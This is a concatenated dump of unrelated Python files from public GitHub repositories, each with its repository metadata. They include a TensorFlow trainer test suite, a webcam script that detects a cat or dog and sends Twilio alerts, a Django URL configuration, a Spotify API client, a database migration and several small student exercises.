feed_dict_val = {x: x_valid_batch, y_true: y_valid_batch} session.run(optimizer, feed_dict=feed_dict_tr) if i % int(data.train.num_examples/batch_size) == 0: val_loss = session.run(cost, feed_dict=feed_dict_val) epoch = int(i / int(data.train.num_examples/batch_size)) show_progress(epoch, feed_dict_tr, feed_dict_val, val_loss) saver.save(session, os.getcwd()+'/F-Model-CharacterRecognition') total_iterations += num_iteration train(num_iteration=1200)
94b75392a59f3e245de35e339c21bdd3032fb6b9
1162986e591732abb8e165046e838a23ba7c1614
/Final_Project/object-detection/detect.py
76d9118d15bcd50d4329ea251711e5d0f2c58ebc
[]
no_license
ering0427/Interactive-Lab-Hub
6dc69da247c7e78626e2d3b4c2d4bc58a8086178
f0492b6428ae30fe8163e96060e95b4e38374c59
refs/heads/Spring2021
2023-04-20T16:14:10.593078
2021-05-16T18:16:05
2021-05-16T18:16:05
337,768,758
0
0
null
2021-03-24T13:20:38
2021-02-10T15:36:47
Python
UTF-8
Python
false
false
7,917
py
# How to load a Tensorflow model using OpenCV # Jean Vitor de Paulo Blog - https://jeanvitor.com/tensorflow-object-detecion-opencv/ # David edited some stuff from __future__ import print_function import numpy as np import cv2 import sys from pyimagesearch.notifications import TwilioNotifier from pyimagesearch.utils import Conf from imutils.video import VideoStream from imutils.io import TempFile from datetime import datetime from datetime import date import argparse import imutils import signal import time import pygame pygame.mixer.init() pygame.mixer.music.load("recording.ogg") ap = argparse.ArgumentParser() ap.add_argument("-c", "--conf", required=True, help="Path to the input configuration file") args = vars(ap.parse_args()) # load the configuration file and initialize the Twilio notifier conf = Conf(args["conf"]) tn = TwilioNotifier(conf) catAppear = False notifSent = False intruderFound = False writer = None W = None H = None # Load a model imported from Tensorflow tensorflowNet = cv2.dnn.readNetFromTensorflow('frozen_inference_graph.pb', 'ssd_mobilenet_v2_coco_2018_03_29.pbtxt') CLASSES = ["background", "person", "bicycle", "car", "motorcycle", "airplane", "bus", "train", "truck", "boat", "traffic light", "fire hydrant", "unknown", "stop sign", "parking meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra", "giraffe", "unknown", "backpack", "umbrella", "unknown", "unknown", "handbag", "tie", "suitcase", "frisbee", "skis", "snowboard", "sports ball", "kite", "baseball bat", "baseball glove", "skateboard", "surfboard", "tennis racket", "bottle", "unknown", "wine glass", "cup", "fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich", "orange", "broccoli", "carrot", "hot dog", "pizza", "donut", "cake", "chair", "couch", "potted plant", "bed", "unknown", "dining table", "unknown", "unknown", "toilet", "unknown", "tv", "laptop", "mouse", "remote", "keyboard", "cell phone", "microwave", "oven", "toaster", "sink", "refrigerator", "unknown", "book", "clock", "vase", "scissors", "teddy bear", "hair drier", "toothbrush" ] COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3)) img = None webCam = False #if(len(sys.argv)>1 and not sys.argv[-1]== "noWindow"): # try: # print("I'll try to read your image"); # img = cv2.imread(sys.argv[1]) # if img is None: # print("Failed to load image file:", sys.argv[1]) # except: # print("Failed to load the image are you sure that:", sys.argv[1],"is a path to an image?") #else: try: print("Trying to open the Webcam.") cap = cv2.VideoCapture(0) if cap is None or not cap.isOpened(): raise("No camera") webCam = True except: img = cv2.imread("../data/test.jpg") print("Using default image.") while(True): if webCam: ret, img = cap.read() catPrevAppear = catAppear dogPrevAppear = intruderFound rows, cols, channels = img.shape # Use the given image as input, which needs to be blob(s). tensorflowNet.setInput(cv2.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False)) # Runs a forward pass to compute the net output networkOutput = tensorflowNet.forward() # Loop on the outputs for detection in networkOutput[0,0]: score = float(detection[2]) idx = int(detection[1]) # if a dog is detected if CLASSES[idx]=='dog': if score > 0.2: intruderFound = True left = detection[3] * cols top = detection[4] * rows right = detection[5] * cols bottom = detection[6] * rows cv2.imwrite('intruder.jpg',img) if intruderFound and not dogPrevAppear: startT = datetime.now() elif dogPrevAppear: # time difference timeD = (datetime.now() - startT).seconds # if dog appears for more than 2 seconds if intruderFound and timeDiff > 2: print("Intruder detected!") dateA = date.today().strftime("%A, %B %d %Y") msg = "Intruder detected on {} at {}! Intruder is stealing food! Please take action!".format(dateA,datetime.now().strftime("%I:%M%p")) tn.send(msg, 'intruder.jpg') #draw a red rectangle around detected objects cv2.rectangle(img, (int(left), int(top)), (int(right), int(bottom)), COLORS[idx], thickness=2) y = int(top) - 15 if int(top) - 15 > 15 else int(top) + 15 cv2.putText(img, 'intruder', (int(left), y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2) pygame.mixer.music.play() elif CLASSES[idx] == 'cat': if score > 0.2: left = detection[3] * rows top = detection[4] * cols right = detection[5] * cols bottom = detection[6] * rows #draw a red rectangle around detected objects cv2.rectangle(img, (int(left), int(top)), (int(right), int(bottom)), COLORS[idx], thickness=2) y = int(top) - 15 if int(top) - 15 > 15 else int(top) + 15 cv2.putText(img, CLASSES[idx], (int(left), y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2) catAppear = True # if cat just appeared if catAppear and not catPrevAppear: startTime = datetime.now() fourcc = cv2.VideoWriter_fourcc(*"mp4v") writer = cv2.VideoWriter('/home/pi/Interactive-Lab-Hub/Final_Project/object-detection/output.mp4', fourcc, 30, (cols, rows),True) print("Cat appeared!") # if cat previously appeared elif catPrevAppear: timeDiff = (datetime.now() - startTime).seconds # if cat appears for more than 20 seconds if catAppear and timeDiff > 20: if not notifSent: msg = "Bella is still eating!" writer.release() writer = None #tn.send(msg, 'output.mp4') notifSent = True print("Bella is still eating!") else: # Bella left if catPrevAppear: catPrevAppear = False if notifSent: notifSent = False else: endTime = datetime.now() totalSeconds = (endTime - startTime).seconds if totalSeconds >= 2: dateAppeared = date.today().strftime("%A, %B %d %Y") msg = "Bella ate her food on {} at {} for {} " \ "seconds.".format(dateAppeared, startTime.strftime("%I:%M%p"), totalSeconds) if writer is not None: writer.release() writer = None #tn.send(msg, 'output.mp4') if webCam: if sys.argv[-1] == "noWindow": print("Finished a frame") cv2.imwrite('detected_out.jpg',img) continue cv2.imshow('detected (press q to quit)',img) if cv2.waitKey(1) & 0xFF == ord('q'): cap.release() break else: break if writer is not None: writer.write(img) if writer is not None: writer.release() cv2.imwrite('detected_out.jpg',img) cv2.destroyAllWindows()
c1fd06e65d5b13122d537fbad5112f1dbf409c67
d98ee572bfc1bb67415f791603ad912b33f08aa0
/main.py
ee1850cefde429b4bcb73521b38113218cadfd49
[]
no_license
august-Garra96/ejemploGit2
0f5066606c5163f14c2e1ad3591a502f98d9ad9b
e35038c72caeb7cf692075130f8b7b77bb1af141
refs/heads/master
2022-12-13T14:04:51.578019
2020-09-13T20:46:51
2020-09-13T20:46:51
295,235,672
0
0
null
null
null
null
UTF-8
Python
false
false
550
py
# This is a sample Python script. # Press Mayús+F10 to execute it or replace it with your code. # Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings. def print_hi(name): # Use a breakpoint in the code line below to debug your script. print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint. # Press the green button in the gutter to run the script. if __name__ == '__main__': print_hi('Dennis Augusto Garrafa Solis') # See PyCharm help at https://www.jetbrains.com/help/pycharm/
3e499bdabe692c7f2499dfa1097f3d676afb1eb0
2bdb914b6e3fe80ffaeeb2b4e1c0acacba9c94fd
/2019/42/Oppgave 8.py
4ece68e605b32991928c59fb18da44ba0f4986f2
[]
no_license
havardnyboe/ProgModX
9a38c104d09c356a3146f6920e21567d3910569b
222dcb5bf354953e22ab9fb2d1b8ddd2422a427f
refs/heads/master
2022-10-06T17:19:22.895947
2020-06-10T16:02:05
2020-06-10T16:02:05
261,474,216
0
0
null
null
null
null
UTF-8
Python
false
false
133
py
liste = ["Tekst", 42, 3.1415, True, [1, 2], (2, 3)] neste = 0 for i in liste: print(i, "er en", type(liste[neste])) neste+=1
369a652da5dd92413eb7e654dfd2414a1d5eb23f
ad5c146994748e0605e9c17e34f2777b02c3acfc
/progress/todos/urls.py
ae46e61f33eaf83a13fcbbb7cc22ccd94c0f0a78
[]
no_license
riteshghorse/progress-tracker
173435c7d693bb1eafdc30048f8742bf79d736be
1c6e2e0246781caac1b9e8cbf0a1a16165b06f63
refs/heads/master
2021-05-16T01:31:05.095964
2020-06-12T23:16:12
2020-06-12T23:16:12
107,129,159
0
0
null
null
null
null
UTF-8
Python
false
false
174
py
from django.conf.urls import include, url from . import views urlpatterns = [ url(r'^$', views.index, name='index'), url(r'^newEntry$', views.newEntry, name='newEntry'), ]
d30883a494d959001c238d295767929e6d16f5eb
b3c4ec7e3a8db4c18f81a2ada9274497211eb2b1
/E2Ppy/plot_field.py
5fda0a880ca6885aeefb50be84808446c684a5d1
[]
no_license
PNMZR/Python3_FEM_Codes_Recomposed_from_Other_Programming_Languages
fe1de520ba642881e4eebaa8a3e8b41edb3f688b
28c20d3204a3d3aa9500e85bf7944c193037a8d1
refs/heads/master
2022-12-11T16:14:00.309967
2020-09-09T03:56:31
2020-09-09T03:56:31
288,892,351
0
0
null
null
null
null
UTF-8
Python
false
false
803
py
# -*- coding: utf-8 -*- """ Created on Mon Sep 7 09:50:08 2020 @author: lenovo """ import matplotlib.tri as mtri import mesh_region as mesh import matplotlib as mpl import numpy as np def plot_field(pt1, pt2, pt3, pt4, numx, numy, fac, u_x, u_y, field, fig, ax, elemType='T3'): """ Forms a color dependent finite element mesh for plotting outputs """ node, triangles = mesh.mesh_region(pt1, pt2, pt3, pt4, numx, numy, elemType) node = node + fac*np.vstack([u_x, u_y]).T x = node[:, 0] y = node[:, 1] z = field triang = mtri.Triangulation(x, y, triangles-1) # 绘制有限元网格以及等值线图 p = ax.tricontourf(triang, z, 150, cmap=mpl.cm.jet) #ax.triplot(triang, 'ko-') fig.colorbar(p, ax=ax) ax.axis('equal')
d6985200f3c6aa0ed01ddf7d13cc1ecf1ef31fec
d70cdc9a46676acb4c4396cd69f1e8253921858b
/migrations/versions/e0f3844e1176_.py
f86933a8560816039d7de1598b57efd9fad11afd
[]
no_license
Lemon000/Blog
c57105b1260bcfa13bb413713fb8e2bd57400b15
4654a94a72039c8b4664c15787ca6d5a56c67d61
refs/heads/master
2022-12-13T04:31:46.968468
2020-01-08T08:41:45
2020-01-08T08:41:45
232,509,848
0
0
null
2022-12-08T01:07:18
2020-01-08T07:57:39
HTML
UTF-8
Python
false
false
983
py
"""empty message Revision ID: e0f3844e1176 Revises: Create Date: 2020-01-02 17:16:06.788196 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'e0f3844e1176' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('users', sa.Column('id', sa.Integer(), nullable=False), sa.Column('username', sa.String(length=32), nullable=True), sa.Column('password_hash', sa.String(length=128), nullable=True), sa.Column('email', sa.String(length=64), nullable=True), sa.Column('confirmed', sa.Boolean(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('email'), sa.UniqueConstraint('username') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('users') # ### end Alembic commands ###
9681745e47d6259063c31935e92c174f3594e7ae
dc8aa9a5735611ef1cf4002a3bf589bbf8499978
/coursera.org/ciencia-computacao-python-conceitos/semana4/digitos_adjacentes.py
1bb4f4b6905b34cfcfcd9ae3f14bd958db24194b
[]
no_license
pilgerowski/bricabraque
03d7d4abffcfc206c776b96d84eca8b48a3663f0
a2570adcc39bdfcbda6c6f434f6de698ceb0611d
refs/heads/master
2021-01-22T22:13:36.899246
2017-07-27T00:38:35
2017-07-27T00:38:35
92,764,006
0
1
null
2017-07-27T00:38:36
2017-05-29T18:10:45
Python
UTF-8
Python
false
false
330
py
iNumero = int(input("Digite um número inteiro: ")) bHaAdjacenteIgual = False iAnterior = iNumero % 10 while(iNumero > 0): iNumero = iNumero // 10 iDigito = iNumero % 10 if(iDigito == iAnterior): bHaAdjacenteIgual = True iAnterior = iDigito if(bHaAdjacenteIgual): print("sim") else: print("não")
dc16006d123ff7fe0d618a47f7c7bc1f3b5d8f56
99bfe0755549458de6431e6a7376e164d56ddb46
/test.py
20025aec21bd0990db3190ed2192e720dbf706be
[]
no_license
wisch628/spotify-python
8deebbe4843cdcb570426f21ffa482f356d49928
41e3bbd9025e77a67191b9da896ab6d3bbca1938
refs/heads/main
2023-06-24T17:21:16.194499
2021-07-28T07:29:55
2021-07-28T07:29:55
390,256,075
0
0
null
null
null
null
UTF-8
Python
false
false
654
py
import requests import os CLIENT_ID=os.environ.get('CLIENT_ID') CLIENT_SECRET=os.environ.get('CLIENT_SECRET') AUTH_URL = 'https://accounts.spotify.com/api/token' auth_response = requests.post(AUTH_URL, { 'grant_type': 'client_credentials', 'client_id': CLIENT_ID, 'client_secret': CLIENT_SECRET, }) auth_response_data = auth_response.json() access_token = auth_response_data['access_token'] BASE_URL = 'https://api.spotify.com/v1/' headers = { 'Authorization': 'Bearer {token}'.format(token=access_token) } artist = '0TnOYISbd1XYRBk9myaseg' r = requests.get(BASE_URL + 'artists/' + artist, headers=headers) r = r.json() print(r['name'])
b160afb6ee8b864232cf72c473b0df3fc5fed880
0bc334d987b3742d26fb9b8a78d9efc4ca39e926
/main.py
b1e6b63ee826d9cc85b07d949084fb02672b522f
[]
no_license
LiuZH-enjoy/word2vec
822f0b8b302b869dfa0d1c01c2ce2aaa5a5cda0f
0edd078da3b48eecde2bc5765219af6250ab86ff
refs/heads/main
2023-05-13T21:32:51.343580
2021-06-11T07:03:15
2021-06-11T07:03:15
375,935,112
0
0
null
null
null
null
UTF-8
Python
false
false
1,537
py
import torch import argparse import train import preprocess import module import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument('--batch_size', type=int, default=8, help='batch大小(默认为8)') parser.add_argument('--epochs', type=int, default=2000, help='epoch数(默认为2000)') parser.add_argument('--embedding_size', type=int, default=2, help='隐藏层维度(默认为2)') parser.add_argument('--window_size', type=int, default=2, help='背景词长度(默认为2)') args = parser.parse_args() args.device = torch.device('cpu') args.cuda = False dtype = torch.FloatTensor sentences = ["jack like dog", "jack like cat", "jack like animal", "dog cat animal", "banana apple cat dog like", "dog fish milk like", "dog cat animal like", "jack like apple", "apple like", "jack like banana", "apple banana jack movie book music like", "cat dog hate", "cat dog like"] word_sequence = " ".join(sentences).split() # ['jack', 'like', 'dog', 'jack', 'like', 'cat', 'animal',...] vocab = list(set(word_sequence)) # build words vocabulary word2idx = {w: i for i, w in enumerate(vocab)} # {'jack':0, 'like':1,...} args.vocab_size=len(vocab) model = module.Word2vec(args) loader = preprocess.make_data(word_sequence, word2idx, args) train.train(loader, model, args) for i, label in enumerate(vocab): W, WT = model.parameters() x,y = float(W[i][0]), float(W[i][1]) plt.scatter(x, y) plt.annotate(label, xy=(x, y), xytext=(5, 2), textcoords='offset points', ha='right', va='bottom') plt.show()
5a475209b7b16ea0b71a631ccc0dbad6bbfff20f
bf668891c4f8f26b746f83a9c412b7ed9addc835
/demo.py
2fdd67c0cd0428326f993fc06c7307e8f4bd91f0
[ "MIT" ]
permissive
AlbertXu233/RDIE-for-SR-IQA
94f4ab59574b29045c687ba2d25dd713630d1ecd
814831af09f6d166b4b7ad24730499fe2b1a164e
refs/heads/main
2023-06-21T02:05:08.494621
2021-07-09T01:18:18
2021-07-09T01:18:18
384,162,586
0
0
MIT
2021-07-08T15:19:08
2021-07-08T15:03:38
null
UTF-8
Python
false
false
1,150
py
import os import cv2 from RDIE import * hrImgNames = os.listdir('imgs/hr') srImgNames = os.listdir('imgs/sr') hrImgNames.sort(key=lambda x:x.split('.')[0]) srImgNames.sort(key=lambda x:x.split('.')[0]) hrImgNames = ['imgs/hr/'+name for name in hrImgNames] srImgNames = ['imgs/sr/'+name for name in srImgNames] #for calculate RDIE metric = RDIE() values = [] for hrName,srName in zip(hrImgNames,srImgNames): hr = cv2.imread(hrName) sr = cv2.imread(srName) val = metric.call(hr,sr) print(val) values.append(val) values = np.array(values) np.save('imgs/values.npy',values) #for calculate and save RIE maps RIEModel = RIE3C() os.makedirs('imgs/RIE_hr',exist_ok=True) os.makedirs('imgs/RIE_sr',exist_ok=True) for hrName,srName in zip(hrImgNames,srImgNames): hr = cv2.imread(hrName) sr = cv2.imread(srName) hrMap = RIEModel(hr[None,:]) srMap = RIEModel(sr[None,:]) hrMap = 255*tf.transpose(hrMap,[3,1,2,0])[0] srMap = 255*tf.transpose(srMap,[3,1,2,0])[0] cv2.imwrite('imgs/RIE_hr/'+hrName.split('/')[-1],np.array(hrMap,np.uint8)) cv2.imwrite('imgs/RIE_sr/'+srName.split('/')[-1],np.array(srMap,np.uint8))
2bc9e59e83813ef8d9d7d458526f16966d131ff3
33a424e56d9f843c5052464d035cb1cca807ddca
/agent/temboardagent/version.py
bb3bb25db908f2a69980f1fecc915047114ac13e
[ "PostgreSQL" ]
permissive
pgiraud/temboard
9dd6cfb5d6cb5ad5cacd21b079138e9f4b7b7c49
4967cf27de8f731a05167d56a6d3bbd7550c4a3b
refs/heads/master
2022-10-12T18:34:26.950034
2022-09-23T14:25:06
2022-09-23T14:25:06
84,056,172
0
0
NOASSERTION
2021-05-21T14:37:21
2017-03-06T09:45:21
Python
UTF-8
Python
false
false
28
py
__version__ = "8.0b1.post9"
748cba2b3befffb2fb4003ded47dc999b5531b0a
95d7f71d2467d48e91f9e9b2ee6b668794d92b66
/official/core/base_trainer_test.py
a346173a587b1c4e65d6d4d62c357debcafb6a81
[ "Apache-2.0" ]
permissive
ChulanZhang/models
e130d43033d2f34a05fc31f345e3364ad69b4590
341fe24b69d5f9a15872641dbec6aab8a09e1d8e
refs/heads/master
2021-06-24T08:02:58.397775
2021-06-20T15:48:15
2021-06-20T15:48:15
218,371,200
1
0
Apache-2.0
2019-10-29T19:50:47
2019-10-29T19:50:46
null
UTF-8
Python
false
false
13,715
py
# Copyright 2021 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tensorflow_models.core.trainers.trainer.""" # pylint: disable=g-direct-tensorflow-import import multiprocessing import os import sys from absl.testing import parameterized import numpy as np import portpicker import tensorflow as tf from tensorflow.python.distribute import combinations from tensorflow.python.distribute import strategy_combinations from official.core import base_trainer as trainer_lib from official.core import config_definitions as cfg from official.core import train_lib from official.utils.testing import mock_task TPU_TEST = 'test_tpu' in sys.argv[0] GPU_TEST = 'test_gpu' in sys.argv[0] def all_strategy_combinations(): return combinations.combine( distribution=[ strategy_combinations.default_strategy, strategy_combinations.cloud_tpu_strategy, strategy_combinations.one_device_strategy_gpu, ],) def create_in_process_cluster(num_workers, num_ps): """Creates and starts local servers and returns the cluster_resolver.""" worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)] ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)] cluster_dict = {} cluster_dict['worker'] = ['localhost:%s' % port for port in worker_ports] if num_ps > 0: cluster_dict['ps'] = ['localhost:%s' % port for port in ps_ports] cluster_spec = tf.train.ClusterSpec(cluster_dict) # Workers need some inter_ops threads to work properly. worker_config = tf.compat.v1.ConfigProto() if multiprocessing.cpu_count() < num_workers + 1: worker_config.inter_op_parallelism_threads = num_workers + 1 for i in range(num_workers): tf.distribute.Server( cluster_spec, job_name='worker', task_index=i, config=worker_config, protocol='grpc') for i in range(num_ps): tf.distribute.Server( cluster_spec, job_name='ps', task_index=i, protocol='grpc') cluster_resolver = tf.distribute.cluster_resolver.SimpleClusterResolver( cluster_spec, rpc_layer='grpc') return cluster_resolver def dataset_fn(input_context=None): del input_context def dummy_data(_): return tf.zeros((1, 1), dtype=tf.float32) dataset = tf.data.Dataset.range(1) dataset = dataset.repeat() dataset = dataset.map( dummy_data, num_parallel_calls=tf.data.experimental.AUTOTUNE) return dataset class MockAsyncTrainer(trainer_lib._AsyncTrainer): """Mock AsyncTrainer to test the _AsyncTrainer class.""" def __init__(self): self._strategy = tf.distribute.get_strategy() self.init_async() self.global_step = tf.Variable( 0, dtype=tf.int64, name='global_step', trainable=False, aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA) self.eval_global_step = tf.Variable( 0, dtype=tf.int64, name='eval_global_step', trainable=False, aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA) train_dataset = self.distribute_dataset(dataset_fn) trainer_lib.orbit.StandardTrainer.__init__( self, train_dataset, options=trainer_lib.orbit.StandardTrainerOptions()) eval_dataset = self.distribute_dataset(dataset_fn) trainer_lib.orbit.StandardEvaluator.__init__( self, eval_dataset, options=trainer_lib.orbit.StandardEvaluatorOptions( use_tf_while_loop=True)) def train_loop_begin(self): self.global_step.assign(0) def train_step(self, iterator): def replica_step(_): self.global_step.assign_add(1) self._strategy.run(replica_step, args=(next(iterator),)) def train_loop_end(self): self.join() return self.global_step.numpy() def eval_begin(self): self.eval_global_step.assign(0) def eval_step(self, iterator): def replica_step(_): self.eval_global_step.assign_add(1) self._strategy.run(replica_step, args=(next(iterator),)) def eval_end(self): self.join() return self.eval_global_step.numpy() class TrainerTest(tf.test.TestCase, parameterized.TestCase): def setUp(self): super().setUp() self._config = cfg.ExperimentConfig( trainer=cfg.TrainerConfig( optimizer_config=cfg.OptimizationConfig({ 'optimizer': { 'type': 'sgd' }, 'learning_rate': { 'type': 'constant' } }))) def create_test_trainer(self, config, model_dir=None, task=None): task = task or mock_task.MockTask(config.task, logging_dir=model_dir) ckpt_exporter = train_lib.maybe_create_best_ckpt_exporter(config, model_dir) trainer = trainer_lib.Trainer( config, task, model=task.build_model(), optimizer=task.create_optimizer(config.trainer.optimizer_config, config.runtime), checkpoint_exporter=ckpt_exporter) return trainer @combinations.generate(all_strategy_combinations()) def test_trainer_train(self, distribution): with distribution.scope(): trainer = self.create_test_trainer(self._config) logs = trainer.train(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertIn('training_loss', logs) self.assertIn('learning_rate', logs) def test_base_async_trainer(self): if TPU_TEST or GPU_TEST: self.skipTest('Aysnc training is not available on GPU/GPU.') num_workers = 3 num_ps = 2 cluster_resolver = create_in_process_cluster(num_workers, num_ps) distribution = tf.distribute.experimental.ParameterServerStrategy( cluster_resolver) with distribution.scope(): trainer = MockAsyncTrainer() trainer.init_async() self.assertIsInstance( trainer._coordinator, tf.distribute.experimental.coordinator.ClusterCoordinator) self.assertEqual(trainer.train(tf.constant(10)), 10) self.assertEqual(trainer.evaluate(tf.constant(11)), 11) def test_async_trainer_train(self): if TPU_TEST or GPU_TEST: self.skipTest('Aysnc training is not available on GPU/GPU.') num_workers = 3 num_ps = 2 cluster_resolver = create_in_process_cluster(num_workers, num_ps) distribution = tf.distribute.experimental.ParameterServerStrategy( cluster_resolver) with distribution.scope(): config = cfg.ExperimentConfig(**self._config.as_dict()) config.trainer.eval_tf_while_loop = True trainer = self.create_test_trainer(config) logs = trainer.train(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertIn('training_loss', logs) self.assertIn('learning_rate', logs) def test_async_trainer_validate(self): if TPU_TEST or GPU_TEST: self.skipTest('Aysnc training is not available on GPU/GPU.') num_workers = 3 num_ps = 2 cluster_resolver = create_in_process_cluster(num_workers, num_ps) distribution = tf.distribute.experimental.ParameterServerStrategy( cluster_resolver) with distribution.scope(): config = cfg.ExperimentConfig(**self._config.as_dict()) config.trainer.eval_tf_while_loop = True trainer = self.create_test_trainer(config) logs = trainer.evaluate(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertIn('acc', logs) self.assertIn('validation_loss', logs) @combinations.generate(all_strategy_combinations()) def test_trainer_validate(self, distribution): with distribution.scope(): trainer = self.create_test_trainer(self._config) logs = trainer.evaluate(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertEqual(logs['counter'], 5. * distribution.num_replicas_in_sync) self.assertIn('validation_loss', logs) @combinations.generate(all_strategy_combinations()) def test_trainer_validate_without_loss(self, distribution): class MockTaskWithoutValidationLoss(mock_task.MockTask): def validation_step(self, inputs, model, metrics=None): # Disable validation loss. logs = super().validation_step(inputs, model) del logs[self.loss] return logs with distribution.scope(): task = MockTaskWithoutValidationLoss() trainer = self.create_test_trainer(self._config, task=task) logs = trainer.evaluate(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertEqual(logs['counter'], 5. * distribution.num_replicas_in_sync) self.assertNotIn('validation_loss', logs) @combinations.generate( combinations.combine( mixed_precision_dtype=['float32', 'bfloat16', 'float16'], loss_scale=[None, 'dynamic', 128, 256], )) def test_configure_optimizer(self, mixed_precision_dtype, loss_scale): config = cfg.ExperimentConfig( runtime=cfg.RuntimeConfig( mixed_precision_dtype=mixed_precision_dtype, loss_scale=loss_scale), trainer=cfg.TrainerConfig( optimizer_config=cfg.OptimizationConfig({ 'optimizer': { 'type': 'sgd' }, 'learning_rate': { 'type': 'constant' }, }))) trainer = self.create_test_trainer(config) if mixed_precision_dtype != 'float16': self.assertIsInstance(trainer.optimizer, tf.keras.optimizers.SGD) elif mixed_precision_dtype == 'float16' and loss_scale is None: self.assertIsInstance(trainer.optimizer, tf.keras.optimizers.SGD) else: self.assertIsInstance(trainer.optimizer, tf.keras.mixed_precision.LossScaleOptimizer) metrics = trainer.train(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertIn('training_loss', metrics) def test_export_best_ckpt(self): config = cfg.ExperimentConfig( trainer=cfg.TrainerConfig( best_checkpoint_export_subdir='best_ckpt', best_checkpoint_eval_metric='acc', optimizer_config=cfg.OptimizationConfig({ 'optimizer': { 'type': 'sgd' }, 'learning_rate': { 'type': 'constant' } }))) model_dir = self.get_temp_dir() trainer = self.create_test_trainer(config, model_dir=model_dir) trainer.train(tf.convert_to_tensor(1, dtype=tf.int32)) trainer.evaluate(tf.convert_to_tensor(1, dtype=tf.int32)) self.assertTrue( tf.io.gfile.exists(os.path.join(model_dir, 'best_ckpt', 'info.json'))) def test_recovery(self): config = cfg.ExperimentConfig( trainer=cfg.TrainerConfig( loss_upper_bound=0.5, recovery_max_trials=2, optimizer_config=cfg.OptimizationConfig({ 'optimizer': { 'type': 'sgd' }, 'learning_rate': { 'type': 'constant' } }))) model_dir = self.get_temp_dir() trainer = self.create_test_trainer(config, model_dir=model_dir) checkpoint_manager = tf.train.CheckpointManager( trainer.checkpoint, self.get_temp_dir(), max_to_keep=2) checkpoint_manager.save() trainer.add_recovery(config.trainer, checkpoint_manager=checkpoint_manager) before_weights = trainer.model.get_weights() _ = trainer.train(tf.convert_to_tensor(1, dtype=tf.int32)) # The training loss is 1.0 and upper_bound is 0.5, so the recover happens. after_weights = trainer.model.get_weights() for left, right in zip(before_weights, after_weights): self.assertAllEqual(left, right) # Let's the loss be NaN and max_trials = 0 to see RuntimeError. config = cfg.ExperimentConfig( trainer=cfg.TrainerConfig( recovery_max_trials=0, optimizer_config=cfg.OptimizationConfig({ 'optimizer': { 'type': 'sgd' }, 'learning_rate': { 'type': 'constant' } }))) task = mock_task.MockTask(config.task, logging_dir=model_dir) def build_losses(labels, model_outputs, aux_losses=None): del labels, model_outputs return tf.constant([np.nan], tf.float32) + aux_losses task.build_losses = build_losses trainer = trainer_lib.Trainer( config, task, model=task.build_model(), optimizer=task.create_optimizer(config.trainer.optimizer_config, config.runtime)) trainer.add_recovery(config.trainer, checkpoint_manager=checkpoint_manager) with self.assertRaises(RuntimeError): _ = trainer.train(tf.convert_to_tensor(2, dtype=tf.int32)) def test_model_with_compiled_loss(self): task = mock_task.MockTask() model = task.build_model() model.compile(loss=tf.keras.losses.CategoricalCrossentropy()) trainer = trainer_lib.Trainer( self._config, task, model=model, optimizer=task.create_optimizer(self._config.trainer.optimizer_config)) logs = trainer.train(tf.convert_to_tensor(5, dtype=tf.int32)) self.assertIn('training_loss', logs) if __name__ == '__main__': tf.test.main()
28c329cdb87b9bf4ba6938afa96149d6b26b45ee
52b5773617a1b972a905de4d692540d26ff74926
/.history/compareVersions_20200909131716.py
d622cfb2cc1588914ad6545a8a07d595eeab93c4
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
461
py
def compare(version1,version2): # split where there are , # then loop through both of them # if v1 > v2 return 1 # if v1 < v2 return -1 # otherwise return 0 v1 = version1.split(".") v2 = version2.split(".") v1 = [int(i) for i in v1] v2= [int(i) for i in v2] for a,b in zip(v1,v2): if a > b: return 1 elif a < b: return -1 return 0 compare("0.1","1.1")
323eafb63b51c67a491bec0c7b176cf634a5ceee
e2fe70d710cc50c5400a26f13281c0b9d68c772f
/module10/les1/first.py
4a98916e3ea0617a633c0a87d29c30efb9290352
[]
no_license
ronylitv/GOIT-Tasks
cca9d95329bbc5810fa1a2be7dc1ab16ac6efaf2
cfeaedefc11a986bd9b146972ef576eadd851abf
refs/heads/master
2023-07-17T05:54:17.694438
2021-08-30T13:15:31
2021-08-30T13:15:31
381,319,034
0
0
null
null
null
null
UTF-8
Python
false
false
307
py
class Rectangle: def __init__(self, high, width): self.width = width self.height = high def perimeter(self): return 2 * (self.height + self.width) def square(self): return self.height * self.width r = Rectangle(2, 10) print(r.perimeter()) print(r.square())
64645b490d8995485103c138e3f412e789ddca2e
017b699d94c0365e3d390bbe9549a0804fa8978c
/Ticket.py
